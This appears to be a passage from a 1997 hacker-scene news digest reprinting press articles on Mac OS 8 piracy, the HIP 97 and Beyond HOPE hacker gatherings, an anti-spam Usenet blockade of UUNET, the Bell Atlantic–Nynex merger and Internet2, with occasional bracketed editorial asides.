  1553.  Hackers pay Apple its due 
  1554.  August 4, 1997  
  1555.  BY CHRIS NOLAN
  1556.  
  1557.  Talk Is Cheap  
  1558.  
  1559.  WHEN it comes to Apple, even thieves get sentimental. Some of those who know 
  1560.  the company best -- computer hackers -- are urging one another not to 
  1561.  download free copies of the company's latest operating system, Mac OS 8. 
  1562.  Instead, they say, Apple supporters should pay money for the operating 
  1563.  system. [Is it just me, or is this stupid reporter calling warez kiddies
  1564.  "computer hackers"? Can't these people tell the fucking difference?]
  1565.  
  1566. "I've seen behavior in the pirate community which is alien to say the least," 
  1567. writes one "bewildered superuser" in a discussion posted on MacInTouch Reader 
  1568. Reports, a Web site for Macintosh supporters and users. "As I looked and 
  1569. looked I found not one (illegal) copy of OS 8 GM available anywhere."
  1570.  
  1571. Hackers [there it is again] usually pride themselves on their ability to get 
  1572. good, new software for free. The faster the hack, the better their ability to 
  1573. manipulate computer code and get products or information companies are 
  1574. anxious to protect. So, this sudden outbreak of belated good citizenship is, 
  1575. well, surprising. It's kind of touching, too.
  1576.  
  1577. "I have always fully intended to purchase the new OS even though I could have 
  1578. it for free just by waiting until we install it at my company and STEAL it 
  1579. then," another Mac user wrote in mid-July, just as talk of former CEO Gil 
  1580. Amelio's resignation began. "Apple needs every penny, every sale they can 
  1581. cobble together right now."
  1582.  
  1583. Writes another MacInTouch reader, one who seems to speak with a bit more 
  1584. hacking authority: "Absolutely NO copies of Mac OS 8.0 Golden Master have 
  1585. been circulating. This is in contrast to 30-40 sites for download Mac OS 
  1586. 7.6cd image in the past. This is EXTREMELY good for Apple and I do support 
  1587. this movement by some people in the computer underground that have found a 
  1588. good conscience." [At least this guy used the term "computer underground"]
  1589.  
  1590. ⌐1997 San Jose Mercury News
  1591. ═───────────────────────────────────────────────────────────═
  1592.  
  1593.  Hackers Frolic in the Woods
  1594.  by Mike Tanner 
  1595.  
  1596.  6:13pm 8.Aug.97.PDT -- One of the first things participants see upon 
  1597.  arriving at HIP 97 - a gathering this weekend of 2,500 members of the 
  1598.  international hacking community at a campground about 30 minutes from 
  1599.  Amsterdam - is a gravestone engraved with Bill Gates' name and the epitaph 
  1600.  "Where do you want to go today?" 
  1601.  
  1602. "All the hackers just go crazy when they see that," event coordinator Maurice 
  1603. Wessling says of this goad to the fest's resolutely anti-authoritarian 
  1604. participants. The marker also serves, however - along with the event's 
  1605. willfully obscure location - to increase the sense of the site as underground 
  1606. and removed from the routine world. "We are trying to disconnect people from 
  1607. their daily whereabouts," Wessling says, "to force them to take a different 
  1608. approach to reality." 
  1609.  
  1610. HIP - the name stands for Hacking in Progress, a follow-up of sorts to 1993's 
  1611. Hacking at the End of the Universe convocation - is a kind of politicized 
  1612. Burning Man for hackers, tent-cities and all-night parties included. Its 
  1613. technopaganism is skewed pretty far toward the techno side, though. HIP is a 
  1614. gathering, says an amused Wessling, where "you'll see these very small 
  1615. igloo-like tents with 17-inch monitors in them." 
  1616.  
  1617. And unlike the pointed pointlessness of Burning Man, HIP hopes to address 
  1618. concrete issues that affect the lives of the participants, such as Internet 
  1619. censorship, spam, and, of course, cryptography. Spamming may seem off the 
  1620. subject for a group dedicated to abrogating the rules of the Internet, but 
  1621. Wessling explains that its proliferation threatens to make the Net unusable, 
  1622. while measures to prevent it may lead to censorship. "The essence of HIP is 
  1623. that the technical aspect and the political aspect are two sides of the same 
  1624. coin," he says. 
  1625.  
  1626. This is not to say that elements of hacking's criminal background won't be 
  1627. evident at the gathering. There is a tent of German participants present to 
  1628. discuss the building of a brute-force DES cracking machine, and a 
  1629. presentation Saturday by another German group that recently made headlines 
  1630. for exploiting ActiveX security holes to intercept home-banking software. 
  1631. Still another demonstration will show how radiation from text on a computer 
  1632. screen can be picked up by an antenna and then displayed on another machine. 
  1633.  
  1634. But HIP is mainly about how these techniques, and the laws and technologies 
  1635. used to address them, will affect the freedom and utility of the online world 
  1636. - about how the protocols developed and exposed by hackers now, says 
  1637. Wessling, "will be used against us later." 
  1638.  
  1639. This direction isn't surprising, considering that HIP administrator Wessling 
  1640. is a former writer for a grassroots publisher of books on police and 
  1641. intelligence issues. It's also a reflection of the fact that the hacker class 
  1642. went from being a bane of the network system to becoming its architects. 
  1643. Wessling's salary, in fact, is paid by XS4All, a high-profile Dutch ISP 
  1644. itself founded by a group of former hackers. 
  1645.  
  1646. Although many hackers have gone corporate, says Wessling, "We still feel the 
  1647. urge to do crazy things like this." 
  1648.  
  1649. The event's geographical and psychological disconnection is in stark contrast 
  1650. to HIP's strikingly powerful electronic connections to the outside world, 
  1651. which consist of a microwave beam IP connection to the campground and a 
  1652. glass-fiber network connecting 600 participants' computers and growing. 
  1653.  
  1654. Organizers have also secured extra transatlantic bandwidth for the event. 
  1655. Aside from allowing homebound hackers to be involved in the gathering through 
  1656. audio and video feeds to HIP's Web site, it also allows the fest to be 
  1657. closely coordinated with the simultaneous Beyond HOPE hackers' conference in 
  1658. New York. In fact, HIP was officially opened Friday morning via video link 
  1659. from the HOPE site by 2600 magazine editor Emmanuel Goldstein. 
  1660.  
  1661. These being hackers, however, all that networking muscle is also being used 
  1662. for such things as a long-distance switch to turn a red light at each 
  1663. convention location on and off from across the ocean. On a slightly more 
  1664. useful front, 10 HIPsters are now working their PCs 24 hours a day building 
  1665. what was a small text site into the real-time multimedia hub. "If they do 
  1666. something wrong in the coding," says Wessling, "they instantly get three 
  1667. emails from all over the world. It's a completely new way of error-checking." 
  1668.  
  1669. That the connections work at all is impressive. Richard Thieme, a writer and 
  1670. frequent speaker at hacker conventions, points out that at this year's 
  1671. version of the venerable DEFCon, organizers were unable to get their T1 
  1672. connection to work. Though they stake their reputations on their ability to 
  1673. manipulate network technology, says Thieme, hackers are really playing 
  1674. catch-up with corporations, which conduct complex video conferences as a 
  1675. matter of routine. "These are not professional meeting-planners," he says. 
  1676.  
  1677. Whether such get-togethers work with the groups' natural skills, though, 
  1678. Wessling believes they are worth the effort: "This is very important, because 
  1679. it is one of the rare opportunities for these people to really get together." 
  1680.  
  1681. For participant Alfred Heitink, who's using his trip to HIP partly as an 
  1682. opportunity to establish an online adoptee network, "It is strange to talk at 
  1683. a camping site with people at 7 o'clock about PGP.... That's what makes this 
  1684. place so special." 
  1685.  
  1686. ⌐1993-97 Wired Ventures, Inc.
  1687. ═───────────────────────────────────────────────────────────═
  1688.  
  1689.  `Spam' foes tie up Usenet   
  1690.  Tuesday, August 5, 1997  
  1691.  BY DAVID L. WILSON
  1692.  
  1693.  In the old West, Committees of Vigilance arose when there was no legitimate 
  1694.  legal authority, enforcing local mores, sometimes with the aid of a noose. 
  1695.  Now, electronic vigilantes have leaped into action on the modern-day 
  1696.  frontier, the Internet, squelching the ability of hundreds of thousands of 
  1697.  people to get their word out on global bulletin boards.
  1698.  
  1699. Since Friday evening, a group of computer system administrators has been 
  1700. striking back against "spammers" by blocking Usenet messages sent from a 
  1701. major Internet service provider. As a result, the vast majority of people who 
  1702. rely on UUNET Technologies Inc., one of the largest Internet service 
  1703. providers, have been unable since Friday to post messages to Usenet, a kind 
  1704. of electronic bulletin board accessible through the Internet. Tens of 
  1705. thousands of messages have been blocked by the protest, which continued 
  1706. Monday night. 
  1707.  
  1708. Usenet is made up of thousands of "newsgroups," each dedicated to a specific 
  1709. topic, from Star Trek to mystery novels to the music of Beethoven. Accepted 
  1710. practice is that any message posted to a newsgroup must be germane to the 
  1711. group. Some people ignore the unwritten etiquette of Usenet, however, and 
  1712. post the same message -- usually an advertisement -- in as many newsgroups as 
  1713. they can, a process called "spamming." It was not known how many of the 
  1714. blocked messages were such ads. 
  1715.  
  1716. In recent years, vigilantes have sprung up who cancel such spams on an 
  1717. individual basis. This latest incident is unusual, however, because it is 
  1718. aimed not at the messages themselves, but at the Internet provider that gives 
  1719. the spammers access to Usenet. The action, believed to be by far the most 
  1720. far-reaching of its kind in the Internet's history, does not affect the 
  1721. ability of UUNET subscribers to send and receive individual e-mail messages 
  1722. or use the World Wide Web.
  1723.  
  1724. Non-spam blocked, too
  1725.  
  1726.  Even so, the scope and indiscriminate nature of the blockage rattled the 
  1727.  Internet community. "I'm very much in sympathy because spam really has 
  1728.  become an enormous problem, but not all the messages they're blocking are 
  1729.  spam," said Mike Godwin, legal counsel for the Electronic Freedom 
  1730.  Foundation in San Francisco, which lobbies for free speech on the Net. 
  1731.  "This is like dropping a nuclear bomb on a town because you know there's a 
  1732.  terrorist living there."
  1733.  
  1734. A communique, apparently from the unnamed systems administrators' group 
  1735. behind the blockade, was posted on Usenet. It says several people are 
  1736. involved in the action against UUNET, and that the action was taken because 
  1737. in recent weeks one-third to one-half of Usenet spam has originated with 
  1738. UUNET. The communique says the huge volume of spam threatens to destroy the 
  1739. network, and that the action was taken only because the company has ignored 
  1740. repeated requests from administrators around the world to do something about 
  1741. the spam problem. System administrators are persons who oversee computers 
  1742. that route messages on the Usenet system.
  1743.  
  1744. Officials with UUNET, based in Fairfax, Va., said they would not comment 
  1745. until today, however the company's chief executive, John Sidgemore, told the 
  1746. Washington Post, "These people are not government agents or the police. They 
  1747. have absolutely no right to cancel service on someone else's infrastructure."
  1748.  
  1749.  An employee of the company who agreed to comment on condition of anonymity, 
  1750.  said, "I can assure you that this company will use every legal means at its 
  1751.  disposal to deal with it."
  1752.  
  1753. UUNET provides Internet access to about 50,000 subscribers, but not 
  1754. individual users, only other Internet service providers. The number of people 
  1755. dependent upon UUNET is unknown but could be in the millions.
  1756.  
  1757. Individual users would bump into the blockade if their local Internet service 
  1758. provider purchases Usenet access through UUNET. Users may not even know that 
  1759. their postings are being blocked.
  1760.  
  1761. Vowing to continue
  1762.  
  1763.  The individuals who helped develop the blockade say they had no choice. "We 
  1764.  are convinced this action was necessary to save the Net," said Dennis 
  1765.  McClain-Furmanski, a student at Radford University in Radford, Va., who is 
  1766.  acting as a spokesman for the group, which numbers about 20. The group has 
  1767.  vowed to continue the action until UUNET takes some kind of action to 
  1768.  minimize the spam it sends out into Usenet.
  1769.  
  1770. While spams have existed almost as long as Usenet, their numbers have 
  1771. increased vastly in the last year. And spammers have become sneakier, forging 
  1772. fake return addresses, and even forging permission to appear in a "moderated" 
  1773. news group, where theoretically only messages approved by a human moderator 
  1774. appear.
  1775.  
  1776. The vigilantes who are deleting the Usenet contributions are using -- or 
  1777. misusing -- a "cancel" feature built into the underlying software on which 
  1778. Usenet is based. Theoretically, only the person who posted an article on 
  1779. Usenet can issue a cancel command for it.
  1780.  
  1781. Once issued, a cancel message races through the computers connected to the 
  1782. system around the world, erasing the article. Cancel messages are 
  1783. legitimately used by authors who have made a mistake or wish to withdraw an 
  1784. article for some other reason.
  1785.  
  1786. Because there are no widespread authentication schemes in use on the 
  1787. Internet, it is fairly easy to forge a sender's address, however. And there 
  1788. are computer programs known as "cancelbots" that can be ordered to forge 
  1789. cancel messages against a spam and erase it throughout Usenet. The vigilantes 
  1790. use such cancelbots to eliminate spam whenever they spot it.
  1791.  
  1792.  Local system administrators can thwart such tactics by disabling the cancel 
  1793.  feature on their systems. Therefore, the vigilantes argue, their cancel 
  1794.  messages are mere "advisories."
  1795.  
  1796. There have long been people who forge cancel messages, and even some 
  1797. legendary ``cancel wars'' between people who have attempted to shut each 
  1798. other up. But never before have so many users been cut off.
  1799.  
  1800. "In military terms, this is acceptable collateral damage," said 
  1801. McClain-Furmanski. The amount of Usenet spam coming out of UUNET connections 
  1802. was so vast that it could no longer be dealt with by programming the 
  1803. cancelbots to eliminate individual messages, he said, so they were programmed 
  1804. to eliminate anything that came out of UUNET.
  1805.  
  1806. Sean Eric Fagan of San Jose has owned a Usenet site for more than eight 
  1807. years. He is not directly participating in the blockade, but is supporting 
  1808. the participants. "I moderate the newsgroup comp.std.unix, which gets almost 
  1809. nothing but spam these days," he said.
  1810.  
  1811. Fagan says everyone involved in the situation understands the danger that the 
  1812. power being wielded could be misused. "There's a hazard any time you've got 
  1813. somebody trying to enforce standards," he said, "but these people are not 
  1814. vigilantes."
  1815.  
  1816. Others disagree, however. Godwin said, "Unless they've been deputized, then 
  1817. this is vigilante action."
  1818.  
  1819. ⌐1997 San Jose Mercury News 
  1820. ═───────────────────────────────────────────────────────────═
  1821.  
  1822.  Netly News - HOPE On A Rope 
  1823.  
  1824.  Nothing makes hackers happier than breaking into a computer that another 
  1825.  hacker set up, especially when an appreciative audience is watching. Small 
  1826.  surprise, then, that there were plenty of grins at last weekend's Beyond 
  1827.  HOPE hacker convention in New York City.  
  1828.  
  1829. The first break-in attempt came at about 4 a.m. on Friday when a huge, 
  1830. tattoo-encrusted Englishman named Cyberjunkie ran a utility that probed the 
  1831. network of HOPE's Dutch sister conference, Hacking In Progress. The plan: to 
  1832. expose any weaknesses, then peel away the security measures of the target 
  1833. computer like the layers of an onion. The program quickly found several 
  1834. obvious security holes. "So I had to do something," Cyberjunkie says. "It's a 
  1835. bit like waving a red flag at a bull, isn't it?" Like the encierro at 
  1836. Pamplona, Cyberjunkie sent a stampede of null information into one of the 
  1837. server's memory buffers until it choked and overloaded. Quietly attached at 
  1838. the end was a simple script that granted him the access he wanted. (In hacker 
  1839. argot, this is known as an IMAP exploit.)  
  1840.  
  1841. Because hacking is not only encouraged but rewarded at HOPE -- which 
  1842. conference organizer Emmannuel Goldstein revived this summer after a 
  1843. three-year hiatus -- each of the thousands of participants received an IP 
  1844. address with which they could glom onto the Puck Building's 10-megabit 
  1845. network and connect to the rest of the world. The Pittsburgh-based DataHaven 
  1846. Project provided 15 public terminals, but Ethernet hub plugins were 
  1847. plentiful. Confused? No problem. The 13-year-old with braces in the next 
  1848. chair was glad to help out. After all, he'd already hooked his ancient DEC, 
  1849. Hewlett-Packard or portable IBM onto the Net and was busily trying to gain 
  1850. root access.  
  1851.  
  1852. When you'd tired of chatting on IRC #hope (topic at 4:11 p.m. on Saturday: 
  1853. "HOPE is a commercial enterprise full of bull"), you could browse through the 
  1854. various kinds of phone equipment, T-shirts or software that were on sale. 
  1855. Ether Bunny sold $250 worth of lineman's equipment (including several 
  1856. Southwestern Bell hard hats) in just over an hour. There was, of course, a 
  1857. constant stream of panels to attend: Tiger Teaming (better known as security 
  1858. consulting); cryptography; how to hack Windows NT; Metrocard hacking; a 
  1859. prisoner panel that included Bernie S. and Phiber Optik; and an amazing talk 
  1860. on privacy given by investigator Steve Rambam.      
  1861.  
  1862. Best known for tracking down 161 Nazi war criminals hiding in Canada, Rambam 
  1863. is a consummate connoisseur of databases. "It is true that I can go online 
  1864. and reliably determine if you are a homosexual or a lesbian. It is true that 
  1865. I can go online and determine your religion. I can go online and, without 
  1866. breaking a sweat or getting carpal tunnel syndrome, find what movies you rent 
  1867. at Blockbuster," he said.  
  1868.  
  1869. Yet Rambam takes an unlikely stance on the privacy issue, especially in a 
  1870. room full of paranoids. Closing off databases, he says, will not adversely 
  1871. affect his work -- since he'll always be able to buy the information from 
  1872. someplace. "It will harm the ability of the average person to control their 
  1873. lives; to check up on government to see if they are lying to him, to check up 
  1874. on big business to see if they are lying to him, to check up on the guy next 
  1875. door and see if he is an ax murderer," he said.  
  1876.  
  1877. Now Rambam may be biased, for he operates a billion-record database that is 
  1878. accessible online to subscribers (he refused to give the URL for fear of 
  1879. hacking attacks). Nevertheless, it was rare to see so many teenagers taking 
  1880. copious notes, noted fellow attendee Shabbir Safdar. The audience couldn't 
  1881. get enough of Rambam, who looked more like a fed than a hacker in his 
  1882. custom-made Hong Kong suit. (A big hit was when he detailed how to turn a 
  1883. dead man's identity into your own.) But ultimately, Rambam questioned why 
  1884. anyone would want to: "The fact of the matter is that there is no real reason 
  1885. to hide most of who you are and what you do."  
  1886.  
  1887. It's an unfortunate but true statement about the state of hacking today. 
  1888. Where have all the good hacks gone? Three years later and the flimsy 
  1889. Metrocard is still impenetrable. A panel of hackers turned security 
  1890. consultants showed that one of the biggest challenges for today's data 
  1891. cowboys was changing the preconceived notions of hackers held by the 
  1892. corporations they work for.  
  1893.  
  1894. Keynote speaker Brock Meeks, went so far as to admonish the crowd for their 
  1895. low hacker batting average (only 20 percent of all government computer 
  1896. systems have been hacked). His address was putatively a history of hacking in 
  1897. America, but it sounded more like a call to arms for the audience. "You're 
  1898. going to have to learn how to hack the media, because you haven't been doing 
  1899. a good job of it," Meeks said.  
  1900.  
  1901. Indeed, hackers get their share of bad press, and they gripe about it to no 
  1902. end. And HOPE highlighted the split personality hackers bring to their 
  1903. relationship with the media. Like most groups, they lambaste journalists. Yet 
  1904. their keynote speaker wasn't an agent provocateur, but a member of the press 
  1905. (albeit an esteemed one who champions the hacker cause). There was a panel 
  1906. discussion (which I participated in) where hackers could finally turn the 
  1907. tables on the media in attendance. "No weapons allowed," said the schedule of 
  1908. events. Yet only one of the audience's questions criticized the press, 
  1909. specifically noting John Markoff and his book on Kevin Mitnick. There was 
  1910. even a "Media Portrayal of Hackers" survey being distributed by a University 
  1911. of Tennessee sociology student as part of his master's thesis.  
  1912.  
  1913. Perhaps it's useless to analyze hacker-vs.-media steretypes. After all, the 
  1914. hacker community has shown that it can successfully run its own magazines, 
  1915. pirate radio stations and web sites. If it's true that information technology 
  1916. is going to obliterate old media, the horsemen of the apocalypse are more 
  1917. likely riding from alt.2600 than from Wired. "The whole 2600 thing is a media 
  1918. hack," admitted Goldstein. And the success of this year's HOPE showed not 
  1919. only that Goldstein knows how to co-opt the media but that he might be a damn 
  1920. good entrepreneur as well.    
  1921.  
  1922. ⌐1997 CNN
  1923. ═───────────────────────────────────────────────────────────═
  1924.  
  1925.  Bell Atlantic-Nynex Merger Gets Final OK 
  1926.  (08/14/97)
  1927.  By Kora McNaughton, TechInvestor
  1928.  
  1929.  WASHINGTON -- The Federal Communications Commission Thursday approved the 
  1930.  merger of Nynex and Bell Atlantic, creating the second-largest phone company 
  1931.  in the United States. 
  1932.  
  1933. Although the FCC's blessing was not altogether unexpected, Wall Street 
  1934. welcomed the news, pushing both companies' stock up after the late afternoon 
  1935. announcement. Bell Atlantic [BEL] gained 1 1/4 to close at 75 15/16; Nynex 
  1936. [NYN] closed up 1 1/8 at 58 1/16. 
  1937.  
  1938. Last month, after the two companies proposed conditions designed to promote 
  1939. competition in their markets, the agency's chairman, Reed Hundt said he was 
  1940. ready to approve the deal. Hundt stumped for a new telecommunications law on 
  1941. Thursday. 
  1942.  
  1943. In a joint announcement, Nynex and Bell Atlantic said they are "pleased" that 
  1944. the agency unanimously agreed to the merger, which will close "as soon as 
  1945. possible." 
  1946.  
  1947. The $23 billion merger, first announced in April of 1996, will create a phone 
  1948. company with a presence in markets covering most of the Eastern seaboard, 
  1949. serving 40 million phone access lines and 5.5 million wireless customers. It 
  1950. will be headquartered in New York. 
  1951.  
  1952. Since the merger was announced, Bell Atlantic and Nynex have been dancing 
  1953. with regulators on both the Federal and local levels. 
  1954.  
  1955. Commissioner Rachelle B. Chong said in a statement Thursday the FCC approved 
  1956. the deal "only after a very careful analysis of the likely market effects of 
  1957. the merger, and the imposition of certain enforceable pro-competitive 
  1958. conditions to help ensure that the local network is opened -- and stays 
  1959. opened -- to new competitors." 
  1960.  
  1961. The conditions include providing detailed performance reports to competitors 
  1962. and regulators, offering interconnection, network element, transport, and 
  1963. termination at rates based on forward-looking economic costs, and offering 
  1964. shared transport priced by the minute and routed just as Bell Atlantic's own 
  1965. traffic, without access charges. 
  1966.  
  1967. Bell Atlantic and Nynex proposed the conditions July 19, one day after the 
  1968. Eighth U.S. Circuit Court in St. Louis ruled that the FCC had exceeded its 
  1969. authority by trying to set the prices new entrants will pay for access to 
  1970. local phone networks. The Baby Bells built the networks, but now must share 
  1971. them with competitors. 
  1972.  
  1973. Long-distance companies such as AT&T and MCI have accused the RBOCs of 
  1974. delaying required upgrades to the local networks to allow for competition; 
  1975. earlier this week, MCI complained Nynex was taking too long to process orders 
  1976. for MCI local service in New York, thereby slowing MCI's growth in that 
  1977. region. 
  1978.  
  1979. In a statement after the ruling Thursday, MCI Chief Policy Counsel Jonathan 
  1980. Sallet praised the FCC. "The conditions that have been announced today and 
  1981. that will be enforced by the FCC will help to alleviate the anticompetitive 
  1982. impact of the Bell Atlantic-Nynex merger," he said. 
  1983.  
  1984. ⌐CMP Media, 1996.
  1985. ═───────────────────────────────────────────────────────────═
  1986.  
  1987.  Getting Ready For Internet2 
  1988.  (08/18/97)
  1989.  By Larry Lange, Electronics Engineering Times
  1990.  
  1991.  ANN ARBOR, Mich. -- The effort to build Internet2--an academic and 
  1992.  government research-only network separate from the increasingly 
  1993.  commercialized Internet--is kicking into high gear following a series of 
  1994.  technical meetings this summer.
  1995.  
  1996. The effort is rapidly picking up participants from universities that want to 
  1997. log on to the proposed high-speed, multimedia-oriented network. And 
  1998. communications OEMs are eyeing Internet2 as an ideal test bed for their 
  1999. next-generation systems. 
  2000.  
  2001. Having completed a critical technical workshop here early this month and one 
  2002. in July in Denver, the Internet2 organization is pushing to meet its 
  2003. self-imposed deadlines for bringing its network live by year's end, with 
  2004. three university members to be connected as early as this month. 
  2005.  
  2006. The network promises benefits for commercial as well as academic Internet 
  2007. users. Obviously, offloading institutional traffic from the commercial 
  2008. Internet will speed transmissions for both Internet and Internet2 users. 
  2009.  
  2010. But the "I2" will also "speed the development of new network features and 
  2011. functionality," said Charles Lee, senior manager of Internet2 interests for 
  2012. MCI Communications Inc. Those features and functions "could then be 
  2013. incorporated into the commercial Internet," Lee said. 
  2014.  
  2015. The work is coming at a time when the underlying base technology of the 
  2016. Internet Protocol is being pulled in many directions. In this environment, 
  2017. communications OEMs are eager for a safe haven to test out future 
  2018. technologies. 
  2019.  
  2020. "Internet2 will provide a large-scale environment to try out new ideas and 
  2021. equipment running at speeds faster than any in operation with an intellectual 
  2022. community of users," said Stephen Wolff, director of business development for 
  2023. Cisco Systems Inc., a participant in the project. 
  2024.  
  2025. The Internet2 organization has grown from 34 members at its October inception 
  2026. to more than 100 research universities today. Notable government 
  2027. representatives hail from the U.S. Department of Energy and the National 
  2028. Science Foundation (NSF, Arlington, Va.). Several members are already 
  2029. engineering prototype network facilities, with the project's initial 
  2030. operations expected to begin by year's end. 
  2031.  
  2032. "We originally thought only 20 to 30 of the major research universities had 
  2033. such a high priority for continuing to build their network infrastructure 
  2034. that they would join the project," said Internet2 director Mike Roberts of 
  2035. Educom, a consortium of universities that promotes the use of information 
  2036. technology in education and research. "Obviously, we were wrong." 
  2037.  
  2038. So far, Internet2 university members have committed up to $50 million per 
  2039. year in new funding for the project, and the commercial sector--with project 
  2040. representation from such companies as Cisco, Lucent Technologies, Sun 
  2041. Microsystems, IBM, AT&T and Microsoft--has pledged more than $5 million. By 
  2042. contributing funding to university partners, the corporations can tap the 
  2043. project as a testbed for unproven Internet technologies--a task that's 
  2044. difficult to undertake on today's overcrowded Internet. 
  2045.  
  2046. Internet2 organizers are working with representatives from IBM, MCI, Cisco 
  2047. and other internetworking companies to discuss the needs of the system 
  2048. architects developing the advanced Internet2 nodes called Gigapops (points of 
  2049. presence)--the network aggregation points for the second-generation Internet 
  2050. wide-area network. 
  2051.  
  2052. Ted Hanss, director of applications development for the Internet2 project, 
  2053. told EE Times that such applications-enabling technologies as security, 
  2054. multicast and quality of service were among the important topics discussed at 
  2055. the summer meetings. The applications heading the list for I2 are 
  2056. collaborative environments, digital libraries, tele-immersion, tele-medicine 
  2057. and distance-independent instruction, Hanss said. 
  2058.  
  2059. Internet2 engineers have officially settled on an architecture of 
  2060. connectivity through Gigapops, which can swiftly connect the campuses, labs 
  2061. and, later, the urban-area and state/regional networks envisioned by the 
  2062. Clinton administration's Next-Generation Internet (NGI) initiative. 
  2063.  
  2064. Accordingly, Internet2 engineers look to deliver 622-Mbit/second 
  2065. transmissions to three supercomputer centers, running the Internet Protocol 
  2066. (IP) over an asynchronous-transfer-mode (ATM) network. And they want to boost 
  2067. bandwidth by nearly 14 percent for the University of Illinois National Center 
  2068. for Supercomputer Applications (NCSA), the San Diego Supercomputer Center and 
  2069. the Pittsburgh Supercomputer Center, with the promise of 20 more universities 
  2070. to be linked by this fall to Gigapops that will deliver data at speeds of at 
  2071. least 155 Mbits/s. (Current commercial transmission speeds top out at 45 
  2072. Mbits/s.) 
  2073.  
  2074. Other Internet2 project members have laid the foundations for connectivity to 
  2075. the network based on its anticipated speeds. A group of universities in 
  2076. California recently announced the building of an Internet2 network that will 
  2077. be designed to connect campuses at speeds of over 600 Mbits/s. 
  2078.  
  2079. "The electronic highway is faced with rush-hour traffic most of the day. We 
  2080. need reliable service delivery," said M. Stuart Lynn, associate vice 
  2081. president at the University of California and the principal investigator for 
  2082. the project. 
  2083.  
  2084. The participating schools include seven campuses of the University of 
  2085. California, along with the California Institute of Technology, California 
  2086. State University, Stanford University and the University of Southern 
  2087. California. Notable goals for the project will be the formation of a virtual 
  2088. university in which students can view publications from distant libraries and 
  2089. take classes located at other campuses. 
  2090.  
  2091. Internet2 is systematically swallowing up the National Science Foundation's 
  2092. Very High-Performance Backbone Network Service (vBNS). More than 50 Internet2 
  2093. institutions have received competitively awarded vBNS grants under the NSF's 
  2094. High Performance Connections program. 
  2095.  
  2096. In fact, vBNS could be considered the heart of Internet2, or at least its 
  2097. substantive launchpad. Begun in 1995, with an investment of $50 million under 
  2098. a five-year cooperative project with MCI, the service links six NSF 
  2099. supercomputer centers and was initially implemented to design and support 
  2100. "gigabit testbeds" for R&D of advanced networking technologies. The centers 
  2101. are located at the Cornell Theory Center, at NCSA and elsewhere. 
  2102.  
  2103. Those technologies included ATM/Sonet, the interfacing of ATM to the High 
  2104. Performance Parallel Interface and HiPPI switches, and all-optical 
  2105. networking. Each testbed addressed an application that required gigabit-speed 
  2106. networks. 
  2107.  
  2108. The trunk-line infrastructure for true broadband services to academia is 
  2109. being defined at a time when the core protocols for the Internet are being 
  2110. upgraded from the original transport and network protocols developed by the 
  2111. Advanced Research Projects Agency (now Darpa) in the 1980s. 
  2112.  
  2113. NSF program director Mark Luker said many of the problems restricting the 
  2114. commercialization of the original Internet "should be solved within the next 
  2115. few years using Internet2." Once traditional not-for-profit users move to the 
  2116. new network, Luker said, "it will be easier to implement pay schemes and give 
  2117. incentives to finance further Internet growth." 
  2118.  
  2119. Luker's comments underscore one of the motivations behind the 
  2120. administration's NGI initiative: relieving the current Internet's bandwidth 
  2121. bottlenecks. 
  2122.  
  2123. "This is an ongoing proposition. It won't stop with Internet2. I see an 
  2124. Internet3 and 4 in the near future," Luker said. By the end of 1998, 
  2125. Internet2 looks to have nearly all participating universities employing 
  2126. stable Internet2 connections. 
  2127.  
  2128. Projects under development with Internet2, Luker said, include digital 
  2129. multimedia libraries accessible in virtual reality, enhanced collaborative 
  2130. workplace communities with live digital video feeds, videoconferencing, 
  2131. collaborative computer-integrated manufacturing, weather forecasting and 
  2132. military-troop-movement monitoring. 
  2133.  
  2134. A briefing on Internet2 by the NASA Ames Research Center at Moffett Field 
  2135. (Mountain View, Calif.) drew more than 60 companies. "Although much of the 
  2136. research needed to make a new, superfast Internet is too risky and long-term 
  2137. for the private sector, our success will depend on partnerships with private 
  2138. industry and universities," Christine Falsetti, NGI project manager at Ames, 
  2139. said. 
  2140.  
  2141. NASA recently designated Ames the lead institution for the agency's $30 
  2142. million portion of a three-year, $300 million federal project to develop the 
  2143. NGI. "We want a network for researchers that is fast from end to end. And we 
  2144. will work with private companies on routers, switchers and computer 
  2145. workstations that will send computer information much faster than today's 
  2146. machines can send it," Falsetti said. 
  2147.  
  2148. One NASA goal is to create "co-laboratories" by linking labs, computers, 
  2149. databases and scientists from around the world via I2. Ames is organizing a 
  2150. September workshop for companies interested in such emerging applications. 
  2151.  
  2152. The NGI initiative was unveiled in October with three basic goals: to connect 
  2153. universities and national labs with high-speed networks that would be 100 to 
  2154. 1,000 times faster than the commercial Internet; to promote experimentation 
  2155. with advanced multimedia technologies, such as real-time videoconferencing; 
  2156. and to demonstrate new applications that support scientific research, 
  2157. national security, distance education, environmental monitoring and health 
  2158. care. 
  2159.  
  2160. On the campaign trail, the Clinton administration promised $100 million in 
  2161. funding for its initiative. The funds are set for release in January. 
  2162.  
  2163. Internet2 spokesmen are quick to say that the network is not designed to 
  2164. replace the existing public Internet or to sidestep the NGI initiative. "The 
  2165. goals of Internet2 and of the NGI are entirely compatible and complementary," 
  2166. said Douglas Van Houweling, vice chairman of Internet2. "There is a 
  2167. compelling unanimity of purpose and direction." 
  2168.  
  2169. Yet Internet2 is not without its critics. There have been suggestions, for 
  2170. instance, that universities are leveraging the project to maintain a separate 
  2171. network presence. 
  2172.  
  2173. But Internet2 Steering Committee member Raman Khanna disputed that assertion. 
  2174. "At Stanford, where I work, only 15 percent of Internet traffic goes toward 
  2175. other universities," Khanna said. "The other 85 percent connects the school 
  2176. to the rest of the commercial network. Even if academia were to isolate its 
  2177. future, high-speed network system, it would speed up only 15 percent of its 
  2178. Internet traffic." 
  2179.  
  2180. Khanna also noted that the high-speed network is merely for the development 
  2181. of advanced applications and that any advances made will be available to all 
  2182. Internet users in three to five years. 
  2183.  
  2184. Another point of controversy is the government's role in funding specific 
  2185. university projects though Internet2. Several high-level lawmakers complained 
  2186. at recent Senate hearings that the NGI program favors urban areas and large 
  2187. universities. 
  2188.  
  2189. But Neal Lane, director of the National Science Foundation, said that 
  2190. Internet2 "is not an established infrastructure like a highway. It is a work 
  2191. in progress . . . and it is experimental. 
  2192.  
  2193. "That is the reason we need the nation's researchers to help us move 
  2194. forward." 
  2195.  
  2196. It remains to be seen whether the Internet2 body can pull off its monumental 
  2197. project and then seamlessly bring the network into line with the commercial 
  2198. Internet and provide bandwidth and multimedia solutions for the NGI, all by 
  2199. the slated deadline of 2000. If it can, the project will look to realize even 
  2200. more impressive goals. 
  2201.  
  2202. Internet2 plans to share discoveries with others in education worldwide. 
  2203. "This is the approach that characterized the first Internet," said NSF's 
  2204. Luker, "and it can work again with Internet2." 
